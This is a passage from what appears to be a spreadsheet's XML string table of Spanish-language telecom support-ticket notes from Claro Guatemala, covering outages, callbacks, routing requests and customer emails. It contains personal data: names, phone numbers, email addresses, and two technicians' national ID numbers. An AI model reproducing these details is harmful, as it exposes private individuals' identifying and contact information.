    <t>**SE LLAMA A CLIENTE FRANCISCO CASTILLO 30442041 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001115259
**</t>
  </si>
  <si>
    <t>F4586353</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR SAMUEL.ESTRADAG  POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE VALIDA QUE NUEVAMENTE HAY CAMBIO DE ESTADO Y NO HAY INFORMACIÓN CONCRETA DEL SEGUIMIENTO O INTENTO DE LLAMADA O CORREO CON EL CLIENTE PARA LA PRONTA RESOLUCIÓN, SE ESCALA CON JUAN MANUEL CARDONA AL 41287321  ID 3001735830 / 3001735895 AL BRINDA LA INFORMACIÓN CORTA LA COMUNICACIÓN
ID 3001735895
NÚMERO: 41287321
DURACIÓN: 0:00:18
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
FECHA: 1/06/2022
HORA: 17:25:22
SE ESCALA CON ÁNGEL CLAVEL AL 41288986 ID 3001736549 SE LE TRASLADA LA INFORMACIÓN Y LE BRINDARAN EL SEGUIMIENTO,
SE CONTACTA AL PR JULIO  AL 58796963  ID 3001734546  CONFIRMA EL SERVICIO Y AUTORIZA EL CIERRE DE LA FALLA, SE NOTIFICA AL GESTOR SAMUEL.ESTRADAG VIA SKYPE VALIDAR EL CIERRE DEL TICKET CON LA SD</t>
  </si>
  <si>
    <t>F4586366</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A RETROALIMENTACION PARA VALIDAR YA QUE ACTUALMENTE SE TIENE EN LINEA OTRO CL-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO RIVERA AL 96533418 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001702702-3001703202
**</t>
  </si>
  <si>
    <t>SE VALIDARA CON CLIENTE SERVICIO ACTUALMENTE ACTIVO---</t>
  </si>
  <si>
    <t>F4586367</t>
  </si>
  <si>
    <t>SE  CONSULTA EN GRUPO DE SKYPE DE BANCO AZTECA PROACTIVO.</t>
  </si>
  <si>
    <t>CLIENTE INDICA:
JORGE, 15:55
BUENAS TARDES, NO SE CUENTA CON LUZ</t>
  </si>
  <si>
    <t>F4586379</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ARASELI  / 58791558 PROCEDE CON PRUEBAS, VALIDA EQUIPOS ENCENDIDOS, APLICA REINICIO PERO ENLACE CONTINUA CAIDO.
PWR: ROJO-VERDE INESTABLE
NET1: APAGADO
USER3: VERDE</t>
  </si>
  <si>
    <t>F4586386</t>
  </si>
  <si>
    <t>SE ENVIA CORREO
RE: FALLA ENLACE CLARO ATM 4238</t>
  </si>
  <si>
    <t>F4586400</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE, Y SE DETERMINÓ QUE EL INCONVENIENTE LO ESTA GENERANDO DEL FORTINET, CLIENTE INDICA QUE ESTARA REALIZANO PRUEBAS Y QUE SE LE LE LLAME A LAS 18:00 HORAS PARA VALIDAR CIERRE DEL CASO.
3001831890
COLA:
NOMBRE: A: 30242558
NÚMERO: 011 50230242558
DURACIÓN: 0:46:08
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50230242558
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 2/06/2022 11:16:33</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE MAURO, SOLICITA:
TODO TRAFICO QUE SE COLOQUE EN XELA 261100009T DEBE LLEGAR AL FIREWAL CON IP 170.21.2.210  EN 261100008T
3001901300
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7753
DURACIÓN: 0:07:15
ESTADO: CONECTADA
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 2/06/2022 13:46:51</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE, MAURO ORTEGA , HANS GODINEZ DE COMERCIAL Y ENRIQUE CASTILLO   EN CONFERENCIA PARA TOMAR REQUERIMIENTOS DEL CLIENTE YA QUE POR EL NUEVO REQUERIMIENTO, PROCEDE CON UNA INGENIERIA MENOR.
3001916565
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7753
DURACIÓN: 0:07:05
ESTADO: CONECTADA
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 2/06/2022 14:37:36</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE PARTE DE CL CONSULTANDO  SOLUCIÓN DE NUESTRO LADO --**
DE: MAURO ORTEGA [MAILTO:MORTEGA@EHUB.COM.GT]
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 02:01
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: MAURO ORTEGA &lt;MORTEGA@RPI.GOB.GT&gt;; DOUGLAS HERNÁN MORALES REYES &lt;DOUGLAS.MORALES@CLARO.COM.GT&gt;; HANS DIETER GODINEZ &lt;HANS.GODINEZ@CLARO.COM.GT&gt;; JULIO MEJIA &lt;JMEJIA@RPI.GOB.GT&gt;; EDGAR RIVAS CARDONA &lt;ERIVAS@RPI.GOB.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ID 26 11 0000 9
CUAL ES LA SOLUCIÓN ?</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 8:56
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; MAURO ORTEGA &lt;MORTEGA@EHUB.COM.GT&gt;
CC: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; MAURO ORTEGA &lt;MORTEGA@RPI.GOB.GT&gt;; DOUGLAS HERNÁN MORALES REYES &lt;DOUGLAS.MORALES@CLARO.COM.GT&gt;; HANS DIETER GODINEZ &lt;HANS.GODINEZ@CLARO.COM.GT&gt;; JULIO MEJIA &lt;JMEJIA@RPI.GOB.GT&gt;; EDGAR RIVAS CARDONA &lt;ERIVAS@RPI.GOB.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ID 26 11 0000 9
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE REALIZAN DESCARTES CON CLIENTE MAURO ORTEGA , SE OBTIENE INFORMACION. CLIENTE REQUIERE  LLEGAR DE ORIGEN XELA 10.174.189.137  ID 261100009T HACIA DESTINO
170.21.2.210  CAPITAL ID 261100008T
3001798692
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7753
DURACIÓN: 0:26:31
ESTADO: ACD - ASIGNADO A: LUVY.SANDOVAL
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 2/06/2022 09:30:28</t>
  </si>
  <si>
    <t>F4586415</t>
  </si>
  <si>
    <t>EN TICKET ANTERIOR SE HABLO CON CLIENTE, YA SE CERTIFICO EL SERVICIO, A NIVEL DE CLARO TODO ESTA BIEN
 01/06/2022 14:52:29 GUATEMALA/CENTRO AMERICA (ODALIS ANAHI CARDENAS SALAZAR):
SE LLAMA A CLIENTE  SHILA RAMIREZ 30895280 QUIEN CONFIRMA SON 6 MBPS CONTRATADOS
SE LE INDICA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 30016754910
************************************************************______************************************************************
 01/06/2022 12:57:30 GUATEMALA/CENTRO AMERICA (ODALIS ANAHI CARDENAS SALAZAR):
SE LLAMA A CLIENTE SHILA RAMIREZ 30895280 MENCIONA QUE VALIDARA CON SU IT CUANDO INCREMENTARON EL ANCHO DE BANDA PORQUE TENIA ENTENDIDO QUE SON 7MBPS
SE LE MENCIONA QUE DE LADO DE CLARO TODO EL SERVICIO ESTA OPERATIVO Y ESTABLE
CLIENTE SOLICITA LLAMADA PARA LAS 14:20
-ID 3001638743</t>
  </si>
  <si>
    <t>F4586416</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. GESLER SEREN 98678952 INFORMA QUE YA SE RETIRARON DE LA OFICINA, AUTORIZA CIERRE DEL INCIDENTE. ID: 3001719406.</t>
  </si>
  <si>
    <t>F4586424</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO GUZMAN AL 55940473  NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001836667
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO GUZMAN AL 55940473  NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001815019
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO GUZMAN 55940473  NO RESPONDE, SE INETNTARA LUEGO
-ID 3001796947</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RODRIGO GUZMAN AL 55940473  NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 3001792354
**</t>
  </si>
  <si>
    <t>F4586489</t>
  </si>
  <si>
    <t>JUAN PABLO MORALES BARRONDO
MIÉ 01/06/2022 5:42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2444¿¿¿¿¿¿¿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6489¿¿
ID: 47502240T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM2444
UBICADO EN:
CAJERO 2444 COMERCIAL VILLAS DEL PRADO, ENTRADA RES. VILLAS DEL PRADO ZONA 0 CHINAUTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4586506</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ELDER QUINTEROS
A QUIEN SE LE INDICO QUE DE LOS 3 E1S SOLO 1 TIENE BLOQUEO ADMINISTRATIVO.
SOLICITA QUE SE LE HABLE AL EJECUTIVO PARA PROCEDER CON EL DESBLOQUEO.
3001746438
COLA:
NOMBRE: A: 57084834
NÚMERO: 011 50257084834
DURACIÓN: 0:02:25
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50257084834
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 18:23:45</t>
  </si>
  <si>
    <t>F4586507</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL MARTINEZ 42306217 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001799845</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE  AXEL MARTINEZ AL 42306217 CONFIRMA SERVICIO ESTABLE Y OPERATIVO INDICA QUE FUE POR ENERGIA EL PROBLEMA**
-ID 3001834278
**</t>
  </si>
  <si>
    <t>F4586512</t>
  </si>
  <si>
    <t>F4586516</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN RALON 22830094 MIGUEL INDICA QUE AUN NO TIENEN EL CONTACTO DE PR, MENCIONA QUE CUANDO LO TENGAN ESTARAN LLAMANDO A CC
-ID 3001780124</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN RALON 22830094 MENCIONA QUE AUN NO LES HAN BRINDADO EL CONTACTO DE PR
CLIENTE INDICA QUE NO SABE HASTA CUANDO TENDRAN EL CONTACTO POR LO QUE SOLICITA SE PROCEDA CON EL CIERRE DE TICKET Y CUANDO YA TENGAN EL CONTACTO ESTARA LLAMANDO PARA APERTURAR NUEVO TICKET
-ID 1001011742</t>
  </si>
  <si>
    <t>-* SE INTENTA CONTACTAR A CRISTIAN RALON 22830094 / 22830095 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO -*
ID DE LLAMADA: 3001986223
3001986283</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE CRISTIAN RALON, QUIEN INDICA QUE AUN LE HAN BRIDANDO CONTACTO EN PUNTO REMOTO, PERO QUE ESTARA COMUNICANDOSE VIA CORREO, SE LE PROPORCIONA EL NUMERO DE SD PARA QUE SE AGREGUE EN ASUNTO, ASI TAMBIEN EL ID DE ENLACE,  SE ESTARA VERIFICANDO CORREO A ESPERA DE RESPUESTA POR EL CLIENTE.
3001892029
COLA:
NOMBRE: A: 22830094
NÚMERO: 22830094
DURACIÓN: 0:02:51
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22830094
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 2/06/2022 13:12:55</t>
  </si>
  <si>
    <t>-*  ERICK PINEDA 22830094 (CLIENTE) INFORMA QUE CONTINUA VIENDO CAIDO EL SERVICIO, REALIZAN PRUEBA DE CONEXION A LA IP 192.168.2.121  Y LA MISMA NO RESPONDE, SE DEJA EN CONFERENCIA CON PERLA ESTRADA (CNOC) PARA VALIDACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4586523</t>
  </si>
  <si>
    <t>**  EN BASE A CRONOS ANTERIOES, SE ENVÍA CORREO A CLIENTE Y EJECUTIVA, A LA ESPERA DE VALIDACION
RE: SOLICITUD DE CAMBIO DE NOMBRE EN LAS EXTENSIONES</t>
  </si>
  <si>
    <t>F4586550</t>
  </si>
  <si>
    <t>SE LLAMA A CLAUDIA PERALTA 40580876 RESPONDE NORMA MENCIONA QUE YA APLICARON REINICIO A LOS EQUIPOS PERO PERSISTE EL PROBLEMA
-ID 3001803306
NOMBRE DEL CLIENTE: PAYLESS SHOESOURCE DE GUATEMALA LTDA
UBICACIÓN:KILOMETRO 15.5 CARRETERA AL SALVADOR CC PRADERA CONCEPCION LOCALES 251 - 251 NIVEL 2
CONTACTO EN SITIO: NORMA  MIJANGOS
HORARIO DE ATENCION: VISITA A PARTIR DE LAS 11:30
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO PAYLESS7636@GNAIL.COM</t>
  </si>
  <si>
    <t>SE LE COMPARTEN LOS DATOS AL CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 19:03
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; PAYLESS 7636 PRADERA CONCEPCIÓN &lt;PAYLESS7636@GMAIL.COM&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
CC: SILVIA KARINA MARISOL LEIVA ORANTES &lt;SILVIA.LEIVA@CLARO.COM.GT&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FW: 7636 PROBLEMA CON INTERNET
BUENAS NOCHES APRECIABLE CLIENTE
LE COMPARTIMOS LOS DATOS DEL PERSONAL, SE ADJUNTA EL EQUIPO DE TRABAJO PARA EVITAR ALGUNA
EVENTUALIDAD.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t>
  </si>
  <si>
    <t>##SE REALIZA CONFERENCIA CLIENTE VERONICA VELASQUEZ , DAVID MONTENEGRO Y TECNICOS DE CAMPO (ANGEL SANDOVAL Y WILSON ECHEVERRIA )##
SE ESTA A LA ESPERA QUE CLIENTE COORDINE VISITA CON RED OPTIMA LOS PERMISOS PARA REVISAR TODO EL CC
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 17:31
PARA: SILVIA KARINA MARISOL LEIVA ORANTES &lt;SILVIA.LEIVA@CLARO.COM.GT&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FW: 7636 PROBLEMA CON INTERNET
MUY BUENAS TARDES ESTIMADA.
CONFORME A LO CONVERSADO POR LLAMADA A LAS 17:25 PM SE DEBE PROCEDER A GESTIONAR PERMISOS EN EL TRANSCURSO DE LA MAÑANA CON RED ÓPTIMA PARA PODER DIAGNOSTICAR EL INCONVENIENTE DE MEJOR MANERA. SE CONVERSA CON VERONICA VELASQUEZ QUE ESTÁ A LA ESPERA QUE RED OPTIMA TRAMITEN LOS PERMISOS PARA QUE INGRESE NUESTRO PERSONAL TÉCNICO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
3001967651
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:16:22
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 2/06/2022 17:34:26</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 10:25
PARA: PAYLESS7636@GNAIL.COM &lt;PAYLESS7636@GNAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 872600044T | PAYLESS SHOESOURCE DE GUATEMALA LTDA | INTERNET_"CRT A EL SALVADOR, 000-000 ALDEA PUERTAPARADA Z08 GUA SCP GU NIVEL 2 KM 15.5 CCPRADERA C
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 872600044T | PAYLESS SHOESOURCE DE GUATEMALA LTDA   |  INTERNET_"CRT A EL SALVADOR, 000-000 ALDEA PUERTAPARADA Z08 GUA SCP GU NIVEL 2 KM 15.5 CCPRADERA C
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO. INDICANDO EL DÍA Y HORA DE VISITA.
TE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S COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 40580876 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001802743</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VERONICA VELASQUEZ /NORMA MIJANGOS   /   CLAUDIA PERALTA AL 40580876  NO RESPONDE || SE INTENTARA LUEGO **
ID 3001773572
**</t>
  </si>
  <si>
    <t>F4586552</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 9:58
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; EDGARDO TURCIOS SALGADO &lt;EDGARDO.TURCIOS@ST-GROUP.COM&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
ASUNTO: RE: PROBLEMAS EN RED CLARO | HONDURAS AMERICAN TABACO
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 16:12
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; EDGARDO TURCIOS SALGADO &lt;EDGARDO.TURCIOS@ST-GROUP.COM&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&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
ASUNTO: RE: PROBLEMAS EN RED CLARO | HONDURAS AMERICAN TABACO
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4586553</t>
  </si>
  <si>
    <t>TTK HEREDADO NO SE TIENE MAS INFORMACION SE PROCEDE A VALIDAR CON EL CLIENTE SI PUEDE PROPORCIONAR UN CONTACTO  PARA REALIZAR PRUEBAS FISICAS EN EQUIPOS YA QUE NO SE TIENE GESTION DE LOS MISMOS.</t>
  </si>
  <si>
    <t>F4586574</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL ---**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 00:37
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 307_629100060T
BUENOS DÍAS ESTIMADO SR. SIERRA.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL A CARGO NOS INDICA QUE ES NECESARIO REALIZAR PRUEBAS CON PERSONAL EN SITIO Y NO SE HA TENIDO ÉXITO CONTACTARLE EN EL NÚMERO DE CONTACTO PROPORCIONADO.
PODRÍA APOYARNOS EN INDICAR UN NUMERO DE CONTACTO ADICIONAL Y VALIDANDO EL HORARIO DE ATENCIÓN POR SI ESTAMOS FUERA DE HORARIO LABORAL DEL PUNTO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN ELIAS SIERRA 50494560221 SOLICITA SE ENVIE LOS DATOS DE PERSONAL TECNICO POR CORREO
-ID 3001927697</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 15:16
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; HECTOR ALFREDO PICH QUISQUINA &lt;HECTOR.PICH@SOMOSCMI.COM&gt;; WALTER.REYES@SOMOSCMI.COM &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 307_629100060T
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO CON LA ADMINISTRACIÓN DEL CENTRO COMERCIAL METROSUR PARA INGRESAR A LAS CAJAS INTERNAS Y REALIZAR MEDICIONES DE COBRE.
NOMBRE                  IBM               DPI
JAVIER CHETE           532967      2149 40594 0103
ERWIN DEL CID        52522        1981 48798 0101
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA Y AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE Y SOLICITAR APOYO VIA CORREO AL CLIENTE CON UN CONTACTO EN SITIO PARA PODER REALIZAR PRUEBAS FISICAS DE EQUIPOS.</t>
  </si>
  <si>
    <t>F4586579</t>
  </si>
  <si>
    <t>SE VALIDA CON PERSONAL DE LA AGENCIA, INDICA QUE NO CUENTAN CON UPS UNICAMENTE CON INVERSOR, Y ESTOS DIAS HA ESTADO INESTABLE LA ENERGIA POR LAS LLUVIAS, EL DIA DE AYER SE REINICIO AL MENOS UNAS 5 VECES INDICA, SE VALIDARA CON LA CENTRAL SI ES POSIBLE INSTALAR UPS POR REINCIDENCIA EN LAS ALARMAS.
ID
3001962846
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:03:31
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 2/06/2022 17:02:32</t>
  </si>
  <si>
    <t>SE LLAMA A ANIBAL GONZALEZ 57081768 PARA INDICARLE LA INFORMACION DE AGENCIA NO CUENTAN CON UPS UNICAMENTE CON INVERSOR, Y ESTOS DIAS HA ESTADO INESTABLE LA ENERGIA, SE VALIDA QUE EN LOS ULTIMOS 30 DIAS HA GENERADO 13 ALARMAS POR REINICIO EN CPE. SIN EMBARGO NO SE LOGRA COMUNICACION CON ANIBAL.
ID
3001968403
COLA:
NOMBRE: A: 57081768
NÚMERO: 55280199
DURACIÓN: 0:00:48
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 2/06/2022 17:21:16</t>
  </si>
  <si>
    <t>F4586580</t>
  </si>
  <si>
    <t>***--- TELMEX COMPARTE EL CONTACTO EN SITIO  Y SOLICITA DATOS DEL PERSONAL TÉCNICO MAS EL ETA -+--*
DE: LAZCANO MEJIA IRVIN YAIR [MAILTO:ILMEJIA@UNINET.COM.MX]
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 04:31
PARA: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; MARTINEZ ALTAMIRANO PEDRO ARTURO &lt;PMARTINE@UNINET.COM.MX&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002473573OC :: TICKET CNOC IMBBL004088:: "FUERA DE SERVICIO"
ESTIMADOS, BUEN DÍA,
COMPARTIMOS DATOS DE CONTACTO EN SITIO: JOSUE ROJAS ROJAS   506 73007029
FAVOR DE COMPARTIRNOS DATOS DE TÉCNICOS Y ETA. QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES | KIND REGARDS | SAUDAÇÕES
